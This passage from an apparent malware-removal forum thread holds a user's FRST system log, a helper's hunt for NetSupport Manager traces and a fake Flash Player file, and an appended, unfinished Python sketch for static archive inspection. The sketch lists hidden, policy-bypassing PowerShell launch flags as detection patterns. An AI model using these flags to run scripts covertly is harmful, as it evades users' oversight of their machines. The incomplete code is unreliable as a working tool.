FirewallRules: [UDP Query User{B1142789-CD51-47E1-B112-81810BF39DA5}D:\origin games\battlefield 4\bf4.exe] => (Allow) D:\origin games\battlefield 4\bf4.exe
FirewallRules: [{40E87360-9770-4735-B681-F6377E9A4DA6}] => (Allow) D:\Program Files (x86)\Origin Games\The Sims 4\Game\Bin\TS4.exe
FirewallRules: [{7098821B-6214-49A2-BA17-73EFE2A7A33A}] => (Allow) D:\Program Files (x86)\Origin Games\The Sims 4\Game\Bin\TS4.exe
FirewallRules: [{74D0FEC3-DAE8-4EEB-BDE7-2B29C2B1CD70}] => (Allow) D:\Program Files (x86)\Origin Games\The Sims 4\Game\Bin\TS4_x64.exe
FirewallRules: [{91F0D73A-E551-4642-843B-F3C68DF58936}] => (Allow) D:\Program Files (x86)\Origin Games\The Sims 4\Game\Bin\TS4_x64.exe
FirewallRules: [{38037FE9-15F0-44AF-98E0-3D81DA7A8A07}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\SourceSDK\bin\SDKLauncher.exe
FirewallRules: [{7FDD561F-80BE-4840-9435-DD21909F0A34}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\SourceSDK\bin\SDKLauncher.exe
FirewallRules: [{CD870190-F2C9-43A3-83D3-32FEF48C8C58}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Metal Gear Solid Ground Zeroes\MgsGroundZeroes.exe
FirewallRules: [{3DA91CA3-8920-40C9-A6D7-BF2167E624E6}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Metal Gear Solid Ground Zeroes\MgsGroundZeroes.exe
FirewallRules: [{3D41DF92-FA5A-452D-B5DB-6F40659E7DDA}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\MGS_TPP\mgsvtpp.exe
FirewallRules: [{2D6440AB-8BA2-4AC3-9094-733299841015}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\MGS_TPP\mgsvtpp.exe
FirewallRules: [TCP Query User{F188874E-1A65-4490-AEFB-6A8461B571BF}D:\program files (x86)\steam\steamapps\common\beamng.drive\bin64\beamng.drive.x64.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\beamng.drive\bin64\beamng.drive.x64.exe
FirewallRules: [UDP Query User{8B0EA685-274D-41AA-A34F-0F9157EFDBEB}D:\program files (x86)\steam\steamapps\common\beamng.drive\bin64\beamng.drive.x64.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\beamng.drive\bin64\beamng.drive.x64.exe
FirewallRules: [{9103A96B-2EA8-4AB9-AA30-F288EE0BF689}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\FaceRig\Bin\Launcher.exe
FirewallRules: [{7D730C60-C0FF-4442-AF17-3C37D543844C}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\FaceRig\Bin\Launcher.exe
FirewallRules: [{B5910554-40B8-4DE9-A5C2-F49234ECF0F4}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\FaceRig\Bin\FaceRig.exe
FirewallRules: [{C5D87D51-6F93-4046-92C7-910F456DA72F}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\FaceRig\Bin\FaceRig.exe
FirewallRules: [TCP Query User{C5D37B21-A5BD-42A1-B357-AB100A8AB3CD}D:\program files (x86)\steam\steamapps\common\starbound\win32\starbound_server.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\starbound\win32\starbound_server.exe
FirewallRules: [UDP Query User{152905EB-21F8-43DD-87D1-9C7ABFCB7C7C}D:\program files (x86)\steam\steamapps\common\starbound\win32\starbound_server.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\starbound\win32\starbound_server.exe
FirewallRules: [{2BD69BB9-2B5E-4DC6-B0E2-BD03A05BF901}] => (Allow) C:\Program Files (x86)\Microsoft Visual Studio Tools for Unity\2015\UnityVS.OpenFile.exe
FirewallRules: [{B785C9CD-4C1D-47AA-8A5B-9EFD4AAB66AD}] => (Allow) C:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\IDE\devenv.exe
FirewallRules: [{1EAC6653-8EE1-4F96-A95A-9877826756CB}] => (Allow) D:\PROGRA~1\Unity\Editor\Unity.exe
FirewallRules: [{4FC44E3D-3D60-4F19-AF3B-02FE0480A259}] => (Allow) D:\Origin Games\Battlefield 4\BF4WebHelper.exe
FirewallRules: [{5C3AB47C-7AA7-4968-8462-A171EF393080}] => (Allow) D:\Origin Games\Battlefield 4\BF4WebHelper.exe
FirewallRules: [{E9F07661-9F53-43A4-A452-531AC1CEB541}] => (Allow) D:\Origin Games\Battlefield 4\BF4X86WebHelper.exe
FirewallRules: [{5EF89873-63F2-4D40-A439-A7C29B7AA621}] => (Allow) D:\Origin Games\Battlefield 4\BF4X86WebHelper.exe
FirewallRules: [{3FDF76EC-035D-498D-876C-A537762CD874}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\DOOM 3 BFG Edition\Doom3BFG.exe
FirewallRules: [{7BF3CE78-6EAB-434C-BC9A-8E2BD95BF60D}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\DOOM 3 BFG Edition\Doom3BFG.exe
FirewallRules: [{A3C56F52-9E98-42B8-BED6-09580F327F25}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\PapersPlease\PapersPlease.exe
FirewallRules: [{30A1F1DA-FD59-47A8-B576-0C492D82E160}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\PapersPlease\PapersPlease.exe
FirewallRules: [TCP Query User{F0C97EFB-452F-4958-8C8A-7A55D0380509}D:\program files (x86)\eldewrito_0.5.0.2_release\eldorado.exe] => (Allow) D:\program files (x86)\eldewrito_0.5.0.2_release\eldorado.exe
FirewallRules: [UDP Query User{986DA3C3-C8B5-4953-9A05-824057A22EFE}D:\program files (x86)\eldewrito_0.5.0.2_release\eldorado.exe] => (Allow) D:\program files (x86)\eldewrito_0.5.0.2_release\eldorado.exe
FirewallRules: [TCP Query User{795E78CC-E1F3-4524-99B3-263752F6AEB5}D:\program files\unity\monodevelop\bin\monodevelop.exe] => (Allow) D:\program files\unity\monodevelop\bin\monodevelop.exe
FirewallRules: [UDP Query User{7495E0A7-780B-4F01-833E-8AE9F5E38F8E}D:\program files\unity\monodevelop\bin\monodevelop.exe] => (Allow) D:\program files\unity\monodevelop\bin\monodevelop.exe
FirewallRules: [TCP Query User{D09C62B2-3BDE-4046-BF07-06C16C759A4C}C:\users\king\desktop\wartektest\wartektest.exe] => (Allow) C:\users\king\desktop\wartektest\wartektest.exe
FirewallRules: [UDP Query User{32CAFB35-B398-4F7D-8529-A625C19EDC46}C:\users\king\desktop\wartektest\wartektest.exe] => (Allow) C:\users\king\desktop\wartektest\wartektest.exe
FirewallRules: [{4621F120-C108-4D42-AA58-2BE1C7967CDF}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Undertale\UNDERTALE.exe
FirewallRules: [{3B1F230B-CE04-4151-81E2-DD63704EDE93}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Undertale\UNDERTALE.exe
FirewallRules: [{1666070A-8FDE-483B-9427-FC9A0006573F}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound - Unstable\win32\launcher\launcher.exe
FirewallRules: [{82705416-5843-4A35-9BD6-5BF0760BD707}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound - Unstable\win32\launcher\launcher.exe
FirewallRules: [{E815DFA6-164B-453F-B3EC-55B1563168DC}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Total War Attila\launcher\launcher.exe
FirewallRules: [{C0A151B1-242E-4952-BA47-E9DEBBD4119B}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Total War Attila\launcher\launcher.exe
FirewallRules: [{F7D2C050-3B60-4C84-BDC1-2DCC4D378BC4}] => (Allow) C:\SteamLibrary\steamapps\common\Counter-Strike Global Offensive\bin\SDKLauncher.exe
FirewallRules: [{DA40A903-4497-4A5A-9CFB-02083DBE6AD1}] => (Allow) C:\SteamLibrary\steamapps\common\Counter-Strike Global Offensive\bin\SDKLauncher.exe
FirewallRules: [{9B1E9324-1C44-48C8-BF66-42EDD9C61B4E}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\killingfloor2\Binaries\Win64\KFGame.exe
FirewallRules: [{3D74C46D-19F5-40F5-89AD-B3DE9C1CE6AF}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\killingfloor2\Binaries\Win64\KFGame.exe
FirewallRules: [TCP Query User{56BC8A14-6879-4CD0-9B23-BE1FB3F04381}D:\program files (x86)\mouseserver\mouseserver.exe] => (Allow) D:\program files (x86)\mouseserver\mouseserver.exe
FirewallRules: [UDP Query User{7A65D2E2-3D32-4EA0-9E00-6AD3D87D6EA1}D:\program files (x86)\mouseserver\mouseserver.exe] => (Allow) D:\program files (x86)\mouseserver\mouseserver.exe
FirewallRules: [TCP Query User{BDF62674-5243-4FE3-9FBC-6BCACE00FA9C}D:\program files\unity\monodevelop\bin\monodevelop.exe] => (Allow) D:\program files\unity\monodevelop\bin\monodevelop.exe
FirewallRules: [UDP Query User{BFEC6B6E-0C27-4309-A8F9-373BCAED5FF8}D:\program files\unity\monodevelop\bin\monodevelop.exe] => (Allow) D:\program files\unity\monodevelop\bin\monodevelop.exe
FirewallRules: [TCP Query User{242D8FC0-D479-4CF0-B417-D4D9C90EE401}C:\users\king\desktop\wartektest\wartektest.exe] => (Allow) C:\users\king\desktop\wartektest\wartektest.exe
FirewallRules: [UDP Query User{AFE96390-E093-42C2-8A69-1A902BC7994B}C:\users\king\desktop\wartektest\wartektest.exe] => (Allow) C:\users\king\desktop\wartektest\wartektest.exe
FirewallRules: [{5EDD6C14-1F0B-4B09-82AB-9AC384B3D074}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\ShadowOfMordor\x64\ShadowOfMordor.exe
FirewallRules: [{D61FEDF3-9B75-4B29-AAB2-C9A6DAF5E3A3}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\ShadowOfMordor\x64\ShadowOfMordor.exe
FirewallRules: [{F6AE6107-BECB-4B8D-AB2F-B9344FB35E56}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound - Unstable\win32\launcher\launcher.exe
FirewallRules: [{09091FC7-8756-483A-88EE-89B663BCBEEA}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound - Unstable\win32\launcher\launcher.exe
FirewallRules: [TCP Query User{3FB29C6D-88CF-4C21-BA7D-67569853204B}D:\program files (x86)\overwatch\overwatch.exe] => (Allow) D:\program files (x86)\overwatch\overwatch.exe
FirewallRules: [UDP Query User{66C34F60-AB38-4060-B6BA-05DCCA6DB008}D:\program files (x86)\overwatch\overwatch.exe] => (Allow) D:\program files (x86)\overwatch\overwatch.exe
FirewallRules: [{642D33F3-E4FA-4D58-8F21-3E8355951D09}] => (Allow) C:\Program Files (x86)\Remote Mouse\RemoteMouse.exe
FirewallRules: [{C3DBDC07-31E8-4357-B18D-A0F6952F1944}] => (Allow) C:\Program Files (x86)\Remote Mouse\RemoteMouse.exe
FirewallRules: [{01AA7BCF-E31D-4555-86AA-C44838D38197}] => (Allow) C:\Program Files (x86)\Remote Mouse\RemoteMouseCore.exe
FirewallRules: [{82FAD941-004E-4FAE-86E6-C615A80E976F}] => (Allow) C:\Program Files (x86)\Remote Mouse\RemoteMouseCore.exe
FirewallRules: [TCP Query User{0A9B801D-E1CA-4639-AAA3-ADF25EA6C3DB}D:\program files (x86)\america's army\system\armyops.exe] => (Allow) D:\program files (x86)\america's army\system\armyops.exe
FirewallRules: [UDP Query User{87AE82B1-7EF6-4780-AE24-C757230B83FD}D:\program files (x86)\america's army\system\armyops.exe] => (Allow) D:\program files (x86)\america's army\system\armyops.exe
FirewallRules: [{0A7316F5-5445-49D6-BFD7-1378C5268862}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Strong Badia the Free\Homestar102.exe
FirewallRules: [{4B62398C-6061-4411-9BF0-F212F00DFF16}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Strong Badia the Free\Homestar102.exe
FirewallRules: [{6BDD5D8F-F571-4856-823D-3CBFF0DA2297}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Total War Attila\launcher\launcher.exe
FirewallRules: [{AEB4236C-3170-4433-98C8-A177E6B35B4A}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Total War Attila\launcher\launcher.exe
FirewallRules: [{7EC6162B-37A6-4D7F-A454-5E587F431807}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\FarCry\Bin32\FarCry.exe
FirewallRules: [{8A74542F-AEFF-437A-A980-F673B123276B}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\FarCry\Bin32\FarCry.exe
FirewallRules: [{80D267BF-66CF-473D-B1B5-93B01F308E83}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\FarCry\Bin32\FarCryConfigurator.exe
FirewallRules: [{7AF1E35D-E2AD-4685-9D24-5FBBECE5F495}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\FarCry\Bin32\FarCryConfigurator.exe
FirewallRules: [{06BFB38F-037F-44C1-AF74-B264017A471F}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\ESEA Premium\eseaclientsteam.exe
FirewallRules: [{14C061E1-E8C4-4F99-82FF-C89DF80D99F8}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\ESEA Premium\eseaclientsteam.exe
FirewallRules: [{74632AA7-5F19-448F-99E3-1BFAD48FE3BD}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound - Unstable\win32\mod_uploader.exe
FirewallRules: [{194EAC41-5CB2-4530-AD7C-7A2EC6366E95}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound - Unstable\win32\mod_uploader.exe
FirewallRules: [{E5021CF3-386F-404E-87F6-43BFA91BC092}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound\win32\mod_uploader.exe
FirewallRules: [{FFB0928C-20BE-4A7E-8D08-C359EE3F6BF7}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound\win32\mod_uploader.exe
FirewallRules: [{1A2668A2-A1CE-4E95-8EE4-D83B1F68FD26}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\killingfloor2\Binaries\Win64\KFGame.exe
FirewallRules: [{0DD35EB4-F01D-43DF-986F-143DB433577D}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\killingfloor2\Binaries\Win64\KFGame.exe
FirewallRules: [{C55A8E05-A470-41B9-B426-242CFBFA82E0}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Crysis\Bin32\Crysis.exe
FirewallRules: [{61FAC0FC-4D85-4624-90F1-1B19B2CE5921}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Crysis\Bin32\Crysis.exe
FirewallRules: [{C1902DEC-91C0-436A-B467-6F7DA36F6255}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound - Unstable\win64\starbound.exe
FirewallRules: [{21E97A04-D9E3-44C9-8CD7-CD3AFE8A0201}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound - Unstable\win64\starbound.exe
FirewallRules: [{EF2055BF-735A-44F5-953A-9DA84028A66D}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound - Unstable\win64\starbound_server.exe
FirewallRules: [{6435999F-264B-420F-B64B-200E214C85A5}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound - Unstable\win64\starbound_server.exe
FirewallRules: [{9A9323FF-4B01-4149-99AC-89A392359115}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound - Unstable\win64\mod_uploader.exe
FirewallRules: [{57BACA16-0FCF-4AD7-8D4A-204FC43344FE}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound - Unstable\win64\mod_uploader.exe
FirewallRules: [{F22CE19B-9651-4970-B538-D4C1C63CDF27}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound - Unstable\win32\starbound.exe
FirewallRules: [{57C9F604-7BAC-4A12-A0F8-5AF334FD441D}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound - Unstable\win32\starbound.exe
FirewallRules: [{B7A39006-CB31-40A1-A999-1E69B6B523E0}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound\win64\starbound.exe
FirewallRules: [{B5B2BB46-53B3-4955-AED1-2EF7D5E19AD5}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound\win64\starbound.exe
FirewallRules: [{DFB07565-6108-40F6-83AF-0F2B4AA4D392}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound\win64\starbound_server.exe
FirewallRules: [{3C42DB7B-1C91-4318-96FD-456E664CED93}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound\win64\starbound_server.exe
FirewallRules: [{4B45D1E0-245A-4AC8-9BCD-DA9F5A42E72F}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound\win64\mod_uploader.exe
FirewallRules: [{24EB6943-07F8-4561-B589-EDE104448B2D}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound\win64\mod_uploader.exe
FirewallRules: [{DBF1D8B2-C781-4C1C-B0A1-D74D56B55C4D}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound\win32\starbound.exe
FirewallRules: [{4E1E669D-CB37-4A5C-B923-5FEDDBB568B6}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound\win32\starbound.exe
FirewallRules: [{6D934F2A-C194-4155-8ADB-70B95EA39AE4}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{7232D68A-B522-45F1-89A6-33738D0DF56B}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
FirewallRules: [{B5D290D2-1611-4859-A938-4ACE6AE2202C}] => (Allow) C:\SteamLibrary\steamapps\common\Counter-Strike Global Offensive\bin\SDKLauncher.exe
FirewallRules: [{AF8BD274-E406-4257-87B3-ED85EC02AACD}] => (Allow) C:\SteamLibrary\steamapps\common\Counter-Strike Global Offensive\bin\SDKLauncher.exe
StandardProfile\AuthorizedApplications: [D:\Program Files (x86)\TriDef 3D\TriDef\TriDefMediaPlayer\TriDefMediaPlayer.exe] => Enabled:TriDef 3D Media Player

==================== Restore Points =========================

12-10-2016 03:00:11 Windows Update
13-10-2016 03:00:17 Windows Update
17-10-2016 13:57:59 Windows Update

==================== Faulty Device Manager Devices =============

Name: Generic USB SM Reader USB Device
Description: Disk drive
Class Guid: {4d36e967-e325-11ce-bfc1-08002be10318}
Manufacturer: (Standard disk drives)
Service: disk
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: Generic USB CF Reader USB Device
Description: Disk drive
Class Guid: {4d36e967-e325-11ce-bfc1-08002be10318}
Manufacturer: (Standard disk drives)
Service: disk
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: 
Description: 
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: Generic USB MS Reader USB Device
Description: Disk drive
Class Guid: {4d36e967-e325-11ce-bfc1-08002be10318}
Manufacturer: (Standard disk drives)
Service: disk
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Event log errors: =========================

Application errors:
==================
Error: (10/19/2016 04:05:35 PM) (Source: OVRServiceLauncher) (EventID: 0) (User: )
Description: Event-ID 0

Error: (10/19/2016 04:00:53 PM) (Source: OculusVR) (EventID: 0) (User: )
Description: Event-ID 0

Error: (10/18/2016 04:37:50 PM) (Source: OculusVR) (EventID: 0) (User: )
Description: Event-ID 0

Error: (10/17/2016 01:46:50 PM) (Source: OculusVR) (EventID: 0) (User: )
Description: Event-ID 0

Error: (10/16/2016 09:44:10 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: steamwebhelper.exe, version: 3.65.13.80, time stamp: 0x57fed9f2
Faulting module name: steamwebhelper.exe, version: 3.65.13.80, time stamp: 0x57fed9f2
Exception code: 0xc0000005
Fault offset: 0x00037b59
Faulting process id: 0x1934
Faulting application start time: 0x01d2269484669b2a
Faulting application path: D:\Program Files (x86)\steam\bin\cef\cef.winxp\steamwebhelper.exe
Faulting module path: D:\Program Files (x86)\steam\bin\cef\cef.winxp\steamwebhelper.exe
Report Id: 57bb53c2-9424-11e6-ad65-485b3912dc4d

Error: (10/16/2016 09:46:52 AM) (Source: OculusVR) (EventID: 0) (User: )
Description: Event-ID 0

Error: (10/15/2016 02:45:12 PM) (Source: OculusVR) (EventID: 0) (User: )
Description: Event-ID 0

Error: (10/15/2016 09:16:44 AM) (Source: OculusVR) (EventID: 0) (User: )
Description: Event-ID 0

Error: (10/14/2016 08:24:36 PM) (Source: OVRServiceLauncher) (EventID: 0) (User: )
Description: Event-ID 0

Error: (10/14/2016 04:43:51 PM) (Source: OculusVR) (EventID: 0) (User: )
Description: Event-ID 0


System errors:
=============
Error: (10/19/2016 04:06:36 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID 
{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}
 and APPID 
{344ED43D-D086-4961-86A6-1106F4ACAD9B}
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool.

Error: (10/19/2016 04:05:36 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load: 
iaStor

Error: (10/19/2016 04:05:35 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The ZoneAlarm Privacy Service service failed to start due to the following error: 
The system cannot find the file specified.

Error: (10/19/2016 04:05:32 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 4:03:59 PM on 10/19/2016 was unexpected.

Error: (10/14/2016 08:25:38 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID 
{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}
 and APPID 
{344ED43D-D086-4961-86A6-1106F4ACAD9B}
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool.

Error: (10/14/2016 08:24:38 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load: 
iaStor

Error: (10/14/2016 08:24:36 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The ZoneAlarm Privacy Service service failed to start due to the following error: 
The system cannot find the file specified.

Error: (10/13/2016 10:44:00 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Steam Client Service service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.

Error: (10/13/2016 10:44:00 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Steam Client Service service to connect.

Error: (10/13/2016 08:20:00 PM) (Source: cdrom) (EventID: 15) (User: )
Description: The device, \Device\CdRom2, is not ready for access yet.


CodeIntegrity:
===================================
  Date: 2015-10-17 00:11:02.687
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2015-10-17 00:11:02.634
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2015-10-17 00:11:02.580
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2015-10-17 00:11:02.526
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2014-06-04 01:58:45.705
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2014-06-04 01:58:45.666
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.


==================== Memory info =========================== 

Processor: Intel(R) Xeon(R) CPU X5670 @ 2.93GHz
Percentage of memory in use: 30%
Total physical RAM: 12279.11 MB
Available physical RAM: 8562.06 MB
Total Virtual: 21479.3 MB
Available Virtual: 16377.64 MB

==================== Drives ================================

Drive c: (SYSTEM SSD) (Fixed) (Total:223.57 GB) (Free:38.5 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: () (Fixed) (Total:931.51 GB) (Free:393.08 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive e: (STORAGE) (Fixed) (Total:1863.01 GB) (Free:1560.55 GB) NTFS
Drive f: (RECORDING SSD) (Fixed) (Total:55.9 GB) (Free:29.19 GB) NTFS
Drive r: (RAPTOR) (Fixed) (Total:139.73 GB) (Free:42.53 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 223.6 GB) (Disk ID: CF682E61)
Partition 1: (Active) - (Size=223.6 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 139.7 GB) (Disk ID: D62865BE)
Partition 1: (Not Active) - (Size=139.7 GB) - (Type=07 NTFS)

========================================================
Disk: 2 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 2A68EE0B)
Partition 1: (Active) - (Size=931.5 GB) - (Type=07 NTFS)

========================================================
Disk: 3 (MBR Code: Windows 7 or 8) (Size: 55.9 GB) (Disk ID: 567706EE)
Partition 1: (Not Active) - (Size=55.9 GB) - (Type=07 NTFS)

========================================================
Disk: 4 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: D652185A)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================


#4 Aura

  • Malware Response Team

Posted 20 October 2016 - 07:04 AM

I don't see any traces of NetSupport Manager on your system :) I'll still make you run a Registry and File search with FRST to be sure of it though.

Farbar Recovery Scan Tool (FRST) - Registry Search
Follow the instructions below to download and execute a Registry search on your system with FRST, and provide the log in your next reply.
  • Right-click on the executable and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Accept the disclaimer by clicking on Yes, and FRST will then do a back-up of your Registry which should take a few seconds;
  • In the Search text area, copy and paste the following:
    NetControlKit
  • Once done, click on the Search Registry button and wait for FRST to finish the search;
  • On completion, a log will open in Notepad. Copy and paste its content in your next reply;
Farbar Recovery Scan Tool (FRST) - File Search
Follow the instructions below to download and execute a file search on your system with FRST, and provide the log in your next reply.
  • Right-click on the executable and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Accept the disclaimer by clicking on Yes, and FRST will then do a back-up of your Registry which should take a few seconds;
  • In the Search text area, copy and paste the following:
    *netsystemkit*
  • Once done, click on the Search Files button and wait for FRST to finish the search;
  • On completion, a log will open in Notepad. Copy and paste its content in your next reply;
Is that file the fake flash player update you downloaded?
2016-10-19 16:19 - 2016-10-19 16:19 - 00117955 _____ (Аdоbе) C:\Users\King\Desktop\install_flаsh_plаyer_for_windows_4_1_9_0172.zip
If so, please upload it to the link below.

http://www.bleepingcomputer.com/submit-malware.php?channel=194

Your next reply(ies) should include:
  • Copy/pasted content of FRST Registry search log;
  • Copy/pasted content of FRST File search log;
  • Whether or not you uploaded the flash player .zip to the link above (if it was the fake flash player update);

Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#5 zengotten

  • Topic Starter

Posted 21 October 2016 - 01:23 AM

Yes that is the file, it was originally an .exe extension but I renamed it to a .zip extension so I could extract the files. I renamed it back to the original .exe extension then uploaded it to the link you provided.

 

It doesn't look like the registry searches found anything  :) :

Farbar Recovery Scan Tool (x64) Version: 17-10-2016
Ran by King (20-10-2016 23:17:04)
Running from C:\Users\King\Desktop
Boot Mode: Normal

================== Search Registry: "NetControlKit" ===========


====== End of Search ======

Farbar Recovery Scan Tool (x64) Version: 17-10-2016
Ran by King (20-10-2016 23:19:41)
Running from C:\Users\King\Desktop
Boot Mode: Normal

================== Search Registry: "netsystemkit" ===========


====== End of Search ======

Thank you for your help.


Edited by zengotten, 21 October 2016 - 01:26 AM.
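
The inspection described in the post above (renaming the .exe to .zip to see what is inside) can be done statically, without renaming or running the file. The sketch below is an added example, not part of the original thread or of any tool named in it; the function names and the in-memory sample are constructed, and the sample filename assumes the lookalike letters in the FRST line are Cyrillic U+0430.

```python
import io
import unicodedata
import zipfile

SCRIPT_EXTS = (".ps1", ".bat", ".cmd", ".vbs", ".js", ".hta", ".wsf")
# Launcher switches taken from the dvstrb.bat shown in the first post.
RISKY_FLAGS = ("-executionpolicy bypass", "-windowstyle hidden")
MAX_MEMBER_BYTES = 1 << 20  # do not inflate members larger than 1 MiB


def mixed_script_chars(name):
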